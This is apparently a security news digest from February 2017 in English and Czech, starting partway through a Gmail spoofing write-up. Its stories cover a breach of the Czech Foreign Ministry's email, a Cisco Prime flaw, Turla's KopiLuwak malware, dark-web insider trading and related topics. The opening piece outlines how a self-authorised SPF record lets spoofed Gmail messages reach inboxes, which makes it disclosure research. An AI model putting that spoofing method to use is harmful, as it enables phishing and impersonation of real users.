As we can see, if you have a “self-authorized-email-server” by your own domain SPF policy, you can deliver spoofed messages pretending to be any existing @gmail.com address to the inbox folder of any other @gmail.com account with no security warning.
As per the results of section 3.3, it was also possible to spoof messages between corporative domains hosted by Google Apps. Beyond the malicious actions that may target a regular Gmail account, this possibility may put at risk entire businesses.
We’ve privately contacted Google Security team informing the possibilities that we have found and the potential impact to users. They gave us a rapid feedback informing that our submission won’t be tracked as a security bug.
Although it has not been considered a security bug, in our opinion, it would be better if Gmail could at least adopt the same behavior we saw when trying to spoof a non-existing Gmail account. The alerts used in this case could prevent users from a variety of malicious actions. Additionally, we suggest to add the possibility to view message security details within the Gmail IOS app, as today users have no options to verify if they are being spoofed.
It’s worth to mention that, as per our experiments, Yahoo rejected spoofed messages in both cases. We didn’t document Outlook.com tests, but the spoofed messages we tried to send were forwarded to recipient’s SPAM folder.
As it can be used by cybercriminals or fraudsters to make victims among Gmail users, we decided to publish this article to make people aware of this possibility and protect themselves.
Víme, jak probíhal útok na Zaorálka. Útočníci si jeho e-maily četli celý rok
2.2.2017 Živě.cz BigBrother
Máme detailní informace o útoku hackerů na Ministerstvo zahraničí
Ministerské e-maily si kdosi četl nejméně rok
Unikly také tisíce souborů DOC, PDF a jiných
Česká bezpečnostní scéna posledních pár dnů řeší průnik neznámých útočníků do poštovního systému Ministerstva zahraničních věcí (více informací zde). Ačkoliv někteří politici uklidňují veřejnost, že nedošlo ke ztrátě citlivých informací, jiní jsou opačného názoru.
Máme k dispozici materiály, které odkrývají, co se vlastně stalo a čeho všeho se neznámí útočníci zmocnili.
19. ledna 2017 informovalo Ministerstvo zahraničních věcí Národní centrum kybernetické bezpečnosti (NCKB) o útoku na e-mailový systém úřadu a požádalo jej o rychlý audit.
Klasická e-mailová pošta sice nesplňuje kritéria tzv. KII – Kritické informační infrastruktury a i ministerstvo se brání, že e-mail nepoužívá k přenosu tajných informací, čili vyšetřování ani nespadá do kompetencí NCKB, bezpečností specialisté se nicméně přesto pustili do pročítání části logů, které od úřadu získali.
Hackeři úspěšně napadli e-maily ministerstva zahraničí. Dostali se i ke komunikaci samotného ministra
Analytici brzy s hrůzou zjistili, že se nejednalo o nějaký letmý průnik do poštovní schránky některého z nižších úředníků ministerstva, ale o detailní sledování 168 schránek, které započalo přinejmenším 8. ledna 2016. Neznámý záškodník měl tedy přístup k ministerské poště déle než jeden rok, aniž by si toho kdokoliv všiml!
Za útokem nejspíše stál Východ
Právě dlouhodobá akce hackerů a fakt, že se zajímali především o schránky nejvyšších činitelů v čele s Lubomírem Zaorálkem, budí podezření, že se jednalo o státem sponzorovaný útok, a to nejspíše z východu. Hackeři se totiž k poštovním schránkám připojovali z IP adresy 78.46.236.7, na které běží ruské webové fórum, případně z adres, které jsou evidované jako uzly anonymní sítě Tor, skrze které pravděpodobně loni útočili Rusové na e-maily představitelů americké Demokratické strany. Konkrétnější spojitost mezi oběma případy ale chybí.
Achillovou patou Ministerstva zahraničních věcí byl jeden z administrátorských poštovních účtů admin5. Zatím není jisté, jak útočníci získali jeho přihlašovací údaje, jelikož však NCKB doporučila ministerstvu zavést u klíčových účtů dvoufaktorové přihlašování a zvážit přístup k důležitým účtům jen z intranetových IP adres, zdá se, že opravdu stačilo sehnat login a heslo – třeba jen sociálním inženýringem, phishingem aj.
Tisíce souborů, seznamy adres...
Každopádně platí, že jakmile útočníci loni zkraje roku pronikli do e-mailu správce, dostali se rázem do celého poštovního systému a bez nadsázky začalo hotové rodeo.
Během roku stáhli z poštovního serveru nejméně 7 119 souborů PDF, DOC a jiných a e-mailové adresy domácích i zahraničních partnerů. Padesátku dokumentů získali z e-mailu Lubomíra Zaorálka, vedle kterého měli dále největší zájem o poštu tehdejších náměstků Petra Druláka, Jakuba Kulhánka, politického ředitele Ivo Šrámka a interní poštovní ústřednu ComCen, která funguje jako jakési překladiště e-mailů.
Upravený Firefox pro anonymní surfování v síti Tor. Pokud zadám do prohlížeče webovou adresu, požadavek na stránku je několikanásobně zašifrovaný a cestuje přes tři různé další uživatele–uzly Toru (na obrázku Francie, Německo, USA), takže jsem velmi těžko dohledatelný, protože na internetu vystupuji pod IP adresou posledního článku v tomto řetězci.
Tyto schránky útočníci sledovali prakticky permanentně po celý rok a mohli je kdykoliv zneužít pro vlastní phishing, kdy jménem některého z vysokých představitelů státu mohli zasílat partnerům ze zahraničí i českým úřadům nejrůznější malware a pokoušet se o další úroveň sofistikovaného sociálního inženýringu: „Ahoj Mirku, tady Lubomír. Jak jste prosím tě pokročili v jednání ohledně XXX?“
O jaké soubory ministerstvo také přišlo
Koordinace přípravy pozic ČR.doc
szbp_evropska_bezp_strategie_mailing_list.pdf
Zápis ze schůze Výboru pro vnitřní bezpečnost 06_2016.pdf
20161220_02 Příloha 1 Tabulka úkolů z jednání EUMC 20. prosince 2016.doc
2016 30.3-7.4. pracovní cesta_USA7.2..doc
(EUMC – European Union Military Committee)
Podle hlaviček zcizených e-mailů se útočníci dozvěděli o přípravách nejrůznějších jednání, získali představu o interním chodu úřadu, jeho prioritách a rozhodovacích procesech. Problém totiž opravdu spočívá v délce sledování. I když totiž e-mail nesloužil k výměně opravdu tajných informací, díky celoročnímu sledování nabrali i tak hromadu citlivých dat, která mohli jako střípky mozaiky složit do uceleného obrazu a získat tak třeba strategickou výhodu při bilaterálních a multilaterálních jednání.
Abych byl konkrétnější, neznámí útočníci sledovali třeba přípravu nejrůznějších dokumentů v čase, takže získali hromadu jejich verzí a tušili, jakým směrem se jednání vyvíjí. Kdyby získali jen jednu verzi, o tento kontext by přišli.
Stačil by dvoufaktor
Nejsmutnější je však na celé věci skutečnost, že běžný e-mail od Googlu (Gmail), Applu nebo třeba Microsoftu (Outlook.com) je mnohem lépe zabezpečený než e-mail jednoho z nejdůležitějších úřadů v zemi. Nabízí totiž volitelně dvoufaktorové přihlašování, kdy ke vstupu na účet potřebujete ještě další ověření třeba pomocí mobilní aplikace, anebo kódu, který dorazí v SMS.
Princip dvoufaktorového/dvoufázového přihlašování. Znalost e-mailové adresy a hesla nestačí, dodatečně je třeba totiž zadat ještě kód, který dorazí třeba jako SMS, anebo potvrdit přihlášení v mobilní aplikaci. Útočník by tedy musel získat fyzický přístup k telefonu, což není tak jednoduché.
Kdyby státní správa používala současný běžný standard zabezpečení jakékoliv komunikace, kdesi nejspíše v Rusku by se nyní rozvědčíci nebavili pročítáním ministerské nedůležité korespondence.
Spamu výrazně přibylo. Je ho nejvíce za posledních sedm let
2.2.2017 Novinky/Bezpečnost Spam
Podíl nevyžádané pošty v e-mailech loni vzrostl na nejvyšší úroveň za posledních sedm let a tvořil zhruba 65 procent všech zpráv. Každou vteřinu je na celém světě odesláno více než 3500 spamů. Zhruba osm až deset procent z nich obsahuje škodlivý software. Vyplývá to ze studie společnosti Cisco.
Novým trikem hackerů se stalo zneužívání programů zobrazující nevyžádanou reklamu (adware). Ty se vyskytují v zařízeních až u 75 procent firem a organizací a mohou se stát základem pro silný útok. Jedním z příkladů může být malware DNSChanger, který umožní útočníkovi kontrolovat síťový provoz. DNSChanger se přitom vyskytuje pouze v zařízeních, která již dříve byla infikována adwarem.
Téměř třetina úspěšně napadených organizací zaznamenala nižší tržby a 38 procent z nich hlásí snížení o více než pětinu. Asi 90 procent napadených firem následně investovalo do zlepšení své kybernetické obrany.
I přesto však zůstává 44 procent bezpečnostních hlášení bez dalšího zkoumání. Více než pětina organizací, na které byl veden úspěšný útok, ztratila zákazníky a 40 procent z nich přišlo o více než pětinu své zákaznické základny.
Vysoce riskantní aplikace
Počet cloudových aplikací, které zaměstnanci využívají, se za dva roky více než zdesetinásobil. Více než čtvrtina aplikací, které pracují přes internet, byla vyhodnocena jako vysoce riskantní.
Polovina firem používá bezpečnostní řešení více než pěti výrobců, tři procenta pak od více než 50 dodavatelů. Složitost bezpečnostní architektury však může paradoxně pomoci útočníkům. Ti mají více času a prostoru pro zahájení útoku.
Ne všechna řešení totiž jsou kompatibilní a ne všechna zařízení v síti bývají chráněna všemi nainstalovanými bezpečnostními produkty. Organizacím navíc taková situace stěžuje hledání bezpečnostních odborníků, neboť práce s mnoha nástroji výrazně zvyšuje nároky na jejich kvalifikaci.
Exploity téměř vymizely
Studie zjistila, že nejrozšířenější nástroje pro šíření škodlivého softwaru (tzv. exploit kity) téměř vymizely. Exploit kity Angler, Nuclear, Neutrino a RIG dříve patřily mezi nejpoužívanější. V listopadu 2016 však jediným aktivním byl RIG.
Ústup exploit kitu Angler souvisí se zatčením 50 ruských hackerů na jaře 2016, kteří využívali škodlivý program Lurk k útokům na ruské banky. Na jejich místo nastupují jiné formy, například Sundown, Sweet Orange a Magnitude. Stejně jako RIG cílí tyto exploit kity na zranitelnosti v Microsoft Internet Exploreru, Flashi a v aplikační platformě Silverlight.
Security Intelligence Automation Startup LogicHub Emerges from Stealth
2.2.2017 securityweeks Cyber
Machine learning and artificial intelligence seem to be the way forward in cyber security; nearly all new companies and products boast that capability. But one new company, emerging from stealth on Wednesday, is a little different. Most current security systems seek to automate knowledge; this one seeks to automate intelligence -- the 'how' over and above the 'what'.
LogicHub announced its arrival with news of an $8.4 million Series A funding round led by Storm Ventures and Nexus Venture Partners. Its purpose is to build a new type of threat detection system based on human security intelligence rather than simply big data analysis. This is based on one primary observation: a top grade human analyst is better at detecting threats than the current generation of threat detection systems.
"We have done what we call cyberhunt challenges with 75 companies," CEO and co-founder Kumar Saurabh told SecurityWeek. "We provided a volume of data containing a threat, and asked each company if its automated system would find it. In only two out of the 75 challenges did the organization say its systems had more than a 50% chance of doing so. But they also said their in-house expert analyst would find it with 90+% confidence."
But when he next asked if they could find the threat in two minutes, the response was resounding: it would take more like two hours. "This is what I hear again and again," he said: "the systems are not clever enough, and the analysts are not fast enough." His solution is to develop a system that can combine the intelligence of analysts with the speed of machines.
"At the end of the day," says Saurabh, "experienced cyber analysts are much better at detecting threats and triaging false alarms than the security tools available, but given the magnitude of the challenge, most teams can only inspect a tiny fraction of all security events collected in-depth. To combat this, LogicHub has found a way to capture and automate the knowledge and expertise of the most skilled cyber analysts, which results in much deeper threat detection."
This is the conundrum that LogicHub has set itself to solve: automating the human expert analyst's threat hunting process rather than just generating and maintaining more and more rules on recognizing known threat indicators. By capturing expertise into a security intelligence 'brain', that expertise can then be used by lower grade analysts in the future. Furthermore, if the expert analyst is tempted away by a higher salary elsewhere, his or her expertise does not entirely leave at the same time.
It requires a different type of architecture, and Saurabh points to Google Search as an example. It is fast, clever, and able to 'predict' user requirements. "One of the key things Google did a couple of years ago," he explained, "was they built a knowledge graph. And that knowledge graph has tens of millions of entities and relationships. They use that knowledge graph to link entities by relationships so that it understands the data it contains."
In fact, in October 2016, City University of New York professor Jeff Jarvis tweeted, "Google knowledge graph has more than 70 billion facts about people, places, things. + language, image, voice translation."
"The difference between Knowledge Graph and the security solutions available today is that they don't understand the data," said Saurabh. "They do nothing to tell the user how to navigate the data." It's like the difference between modern GPS and a road atlas, he continued. "With the atlas, you have the data, but you have to figure out what that data means by yourself."
In threat analysis, there are very few people who really understand what the data means. "Since that understanding is trapped in their heads, it can only be leveraged in a very limited way. With automation, we can take the expertise that is trapped in their heads and turn it into a system so that what one analyst knows and applies can be shared with ten other people on the security team. Over time you can build a system that is more available as a service, and can be used by hundreds of companies -- it becomes a security brain."
Developing that security brain is what LogicHub is doing. It has an augmentation tool that automates that capture of analyst methods, so that different analytical method from different analysts can be combined into the intelligence automation tool. "A security analyst with our security intelligence automation platform can become equal to ten analysts. You have to use the augmentation tool to get there; but it has that potential."
This system will be offered as an on-premise solution for those companies not yet comfortable with the cloud and sharing data, and as a cloud service that combines and shares analytical expertise with all cloud customers.
Critical Cisco Prime Home Flaw Allows Authentication Bypass
2.2.2017 securityweeks Vulnerebility
Cisco has released a software update for its Prime Home remote management and provisioning solution to address a critical authentication bypass vulnerability discovered by the company during internal security testing.
Cisco Prime Home is designed to give Internet service providers (ISPs) visibility into their customers’ home networks, allowing them to easily make configuration changes and software upgrades, and remotely diagnose and troubleshoot problems.
The networking giant discovered that the product’s web-based user interface is affected by a vulnerability that can be remotely exploited by an unauthenticated attacker to bypass authentication and execute any action with administrator privileges.
The flaw, tracked as CVE-2017-3791, is caused by a processing error in the role-based access control (RBAC) of URLs. The security hole can be exploited by sending specially crafted API commands to a particular URL.
The vulnerability affects versions 6.3, 6.4 and 6.5 and it has been addressed with the release of version 6.5.0.1. Workarounds are not available.
Versions 5.2 and earlier are not impacted. However, it’s worth pointing out that, in November 2016, the company informed users about a similar critical authentication bypass vulnerability affecting Cisco Prime versions 5.1.1.6 and earlier and 5.2.2.2 and earlier.
Cisco is only aware of three security holes affecting Cisco Prime Home. The third one, disclosed in September 2016, is a medium severity XML External Entity (XXE) flaw that allows a remote attacker to access information stored on the affected system.
Another critical vulnerability patched recently by Cisco affects the WebEx browser extensions for Chrome, Internet Explorer and Firefox. The vendor has released several updates until it managed to create a proper patch.
Rapid7 Adds Hardware Testing Capabilities to Metasploit
2.2.2017 securityweeks IT
Rapid7 has added a hardware bridge to its Metasploit penetration testing framework, making it easier for users to analyze Internet of Things (IoT) devices. The company said this enhancement makes Metasploit the first general purpose pentesting tool.
Metasploit has allowed researchers to conduct security assessments using Ethernet communications, but now they will also be able to link the tool directly to the hardware via raw wireless and direct hardware manipulation.
Up until now, the framework could be used for hardware testing by creating custom tools for interaction with the targeted product, which Rapid7 says is a time-consuming and resource-intensive process. The new capability allows users to focus on a more important task: developing exploits.Metasploit with hardware bridge
The first release of the hardware bridge focuses on automotive systems, particularly the Controller Area Network (CAN) bus, but the company plans on adding modules for other types of systems in the upcoming period.
According to Rapid7, pentesters can now use Metasploit to analyze industrial control systems (ICS), IoT hardware and software, and software defined radio (SDR). The company believes the new capability makes Metasploit an ideal tool for conducting hardware-based network research.
“Every wave of connected devices – regardless of whether you’re talking about cars or refrigerators – blurs the line between hardware and software. As we like to say, this hardware bridge lets you exit the Matrix and directly affect real, physical things,” said Craig Smith, director of transportation research at Rapid7 and developer of the new capability. “We’re working to give security professionals the resources they need to test and ensure the safety of their products -- no matter what side of the virtual divide they’re on.”
Metasploit already has more than 1,600 exploits and 3,300 modules, and new components are being developed regularly with the aid of hundreds of contributors. According to the Metasploit Project, 190 people made contributions to the framework last year.
Russia-Linked "Turla" Group Uses New JavaScript Malware
2.2.2017 securityweeks Virus
The Russia-linked cyber espionage group known as Turla has been using a new piece of JavaScript malware to profile victims, Kaspersky Lab reported on Thursday.
Turla, an advanced persistent threat (APT) actor that has been active since at least 2007, is believed to be responsible for several high-profile attacks, including the ones aimed at Swiss defense firm RUAG and the U.S. Central Command. The group is also known as Waterbug, Venomous Bear and KRYPTON, and some of its primary tools are tracked as Turla (Snake and Uroburos), Epic Turla (Wipbot and Tavdig) and Gloog Turla.
The cyberspies have been mainly interested in organizations located in Europe and the United States. Recent attacks observed by researchers at Kaspersky Lab appear to have targeted organizations in Greece, Qatar and Romania.
In a report sent out to customers in June 2016, Kaspersky revealed that Turla had started using Icedcoffee, a JavaScript payload delivered via macro-enabled Office documents. In late November, the security firm spotted a new JavaScript payload designed mainly to avoid detection. Microsoft researchers have also been monitoring the threat.
The new malware, dubbed KopiLuwak, has been delivered to at least one victim using a document containing an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus. Since the document appears to have been sent by the Qatar ambassador’s secretary, experts believe the attackers may have breached the diplomatic organization’s network.
The final KopiLuwak payload is hidden under several JavaScript layers. Once it becomes persistent by creating a registry key, the malware executes a series of commands in an effort to collect information about the infected system. The harvested data is stored in a temporary file that is deleted after it’s encrypted and stored in memory.
KopiLuwak then attempts to contact its command and control (C&C) servers. These are compromised websites whose address has been hardcoded into the malware.
The C&C can instruct the malware to sleep, exit and terminate C&C communications until the next reboot, uninstall itself, and run arbitrary commands on the infected system using Wscript.shell.run().
One of the C&C domains had expired, allowing Kaspersky to acquire it and use it as a sinkhole. Several systems connected to this domain, but the most interesting IP was one associated with the Greek Parliament.
For the time being, Kaspersky says KopiLuwak is less popular than Icedcoffee, but the company believes the new malware will be used more in the future as a first-stage delivery mechanism and victim profiler.
“Currently, it seems the Turla actors continue to rely heavily on embedded macros in Office documents,” explained Kaspersky’s Brian Bartholomew. “While this may appear to be an elementary technique to use for such a sophisticated actor, they are repeatedly successful in compromising high value targets with this method.”
Gmail Drops Support for Chrome on Windows XP and Vista
2.2.2017 securityweeks Hacking
Gmail will soon drop support for Chrome version 53 and below, a move expected to hit Windows XP and Vista users the most, given that Chrome 49 was the last browser iteration released for them.
The change will occur on February 8, 2017, when users accessing their Gmail accounts using Chrome 53 or an older browser iteration will be presented with a banner at the top of the Gmail interface, informing them the application is no longer supported.
The idea behind this move, Google says, is to encourage users to upgrade to newer versions of Chrome, with Chrome 56 being the latest. Made available last week, this browser release brought various important security updates, the Internet giant said.
Windows XP and Windows Vista users who access the Internet via Chrome are expected to be impacted the most, Google admits. Chrome 49, which graduated to the stable channel in March 2016, was the last browser version to offer support for the two operating systems.
Chrome users on these platform versions have been left out of almost an entire year of security patches, not to mention that they are also left out of Microsoft’s monthly patches as well. In fact, security experts have already warned of the threat the ongoing use of Windows XP and Vista poses for enterprises.
In December last year, Mozilla announced plans to kill Firefox for Windows XP and Vista. Microsoft stopped updating Internet Explorer 8 (along with IE 9 and 10) in January 2016, which was yet another hit to Windows XP users, since as many as 88% of them still use this browser version.
According to Google, Gmail users who will continue to access their email accounts using Chrome Browser 53 and below will be exposed to security risks and won’t benefit from new features and bugfixes. While Gmail will continue to work for them throughout the year, they “could be redirected to the basic HTML version of Gmail as early as Dec 2017,” the company says in an announcement.
Users are advised to update their browser as soon as possible, to ensure increased security. Administrators too are encouraged to do so, to keep users on the latest version of Chrome. However, some users might need to migrate to a newer operating system to receive access to the latest Chrome release.
Google also underlines that, while its “current supported browser policy” notes that only the most recent version of Chrome is supported, it decided to make the announcement regarding the discontinued support for older versions of Chrome because of the expected impact on Windows XP and Windows Vista users.
Dutch Government announced all ballots will be counted by hand amid cyberattack fears
2.2.2017 securityaffeirs Cyber
Dutch Government announced that all ballots in the election next month will be counted by hand in order to avoid any interference due to cyber attacks.
Recent US 2016 Presidential Election has given the world an important lesson, foreign hackers are a dangerous threat even for democracy.
Recently Franche Defense Minister Le Drian comments expressed concerns about cyber attacks against defense systems and warned of hacking campaigns on the upcoming elections. European Intelligence agencies are warning the Netherlands, France, and Germany of possible manipulation of their voting systems in the forthcoming elections.
In response to the alarm, all ballots in the Netherlands’ election next month will be counted by hand in order to avoid any interference due to cyber attacks.
“Reports in recent days about vulnerabilities in our systems raise the question of whether the results could be manipulated,” explained Interior Minister Ronald Plasterk in a statement on Wednesday. “No shadow of doubt can be permitted.”
Dutch Government
(Photo credit should read ROBIN UTRECHT/AFP/GettyImages)
The Minister fears cyber attacks from foreign states, including Russia that is one of the most dreaded threats.
“Now there are indications that Russians could be interested, for the following elections we must fall back on good old pen and paper,” he added.
The problem is that the Dutch cast paper votes, which are tallied by hand locally, but the overall count of votes is done through computer systems that could be targeted by hackers. Dutch media highlighted that the software used by the government could be hacked by state-sponsored hackers.
“In an earlier report, RTL had said the tallying software was distributed by CD-ROM to regional counting centers where it was installed on old computers that were internet connected – a procedure that experts consulted by the broadcaster considered highly insecure.” reported the Reuters Agency.
“Plasterk told RTL the vote count should not take longer than normal. Election authorities typically publish a preliminary result on the evening after polls close, which is often very close to the final outcome.”
According to intelligence agencies, Russia could attempt to hack voting systems in Europe for destabilizing right movements, the Kremlin of course is denying any involvement in the recent hacking campaigns against Government organizations worldwide.
Hackers Offering Money to Company Insiders in Return for Confidential Data
2.2.2017 thehackernews Hacking
The insider threat is the worst nightmare for a company, as the employees can access company's most sensitive data without having to circumvent security measures designed to keep out external threats.
The rogue employee can collect, leak, or sell all your secrets, including professional, confidential, and upcoming project details, to your rival companies and much more that could result in significant loss to your company.
And this is exactly what is happening on Dark Web Marketplace -- a place where one can sell and purchase everything from illicit drugs to exploits, malware, and stolen data.
According to a new report from the US-based risk security firm RedOwl and Israeli threat intelligence firm IntSights, staff at corporations are selling company's internal secrets for cash to hackers on one of the most famous dark web markets Kick Ass Marketplace (Onion URL).
Besides selling their company's secret information, researchers also found evidence of rogue staff, in some cases, even working with hackers to infect their company networks with malware.
Kick Ass Marketplace offers a subscription of up to one bitcoin (currently around $950) a month to its clients for giving them access to a variety of "vetted and accurate" insider information that is posted onto the website.
Every post is assigned a "confidence rating," along with advice on whether to buy and sell stock in the associated company, allowing its clients to cash in on the insider secrets they collected.
In May last year, an administrator of the Kick Ass Marketplace site going by the pseudonym "h3x" was interviewed by DeepDotWeb, claiming that his site had 15 investment firm members, 25 subscribers, 3 hackers and 2 trading analysts who observe financial markets and verify the integrity of stolen data before posting it to the website.
According to the new report "Monetizing the Insider: The Growing Symbiosis of Insiders and the Dark Web" [PDF] published Wednesday, Kick Ass Marketplace posts about five high confidence insider trading reports every week and makes some US $35,800 a week.
Researchers at RedOwl and IntSights also analyzed another dark web marketplace called "The Stock Insiders" (Onion URL) that only focuses on insider trading opportunities, like recruiting cashiers or other low-end retail staff to cash out stolen credit cards for resellable goods like Apple iPhones.
"In one instance, a hacker solicited bank insiders to plant malware directly onto the bank’s network," says the researchers Ido Wulkan (IntSights), Tim Condello (RedOwl), David Pogemiller (RedOwl).
"This approach significantly reduces the cost of action as the hacker doesn’t have to conduct phishing exercises and can raise success rates by bypassing many of the organization’s technical defenses (e.g. anti-virus or sandboxing)."
The trio even discovered that one hacker was ready to pay the insider "7 figures on a weekly basis" for helping him gaining access to a bank's computer.
The activity of company's insider threats on dark websites has doubled in the last year, which poses a real threat to both consumers and investors, causing greater financial losses than attacks that originate outside the company.
RedOwl and IntSights suggest that corporations should take the insider threat more seriously by making use of IT security systems to carefully monitor their employees without violating their privacy.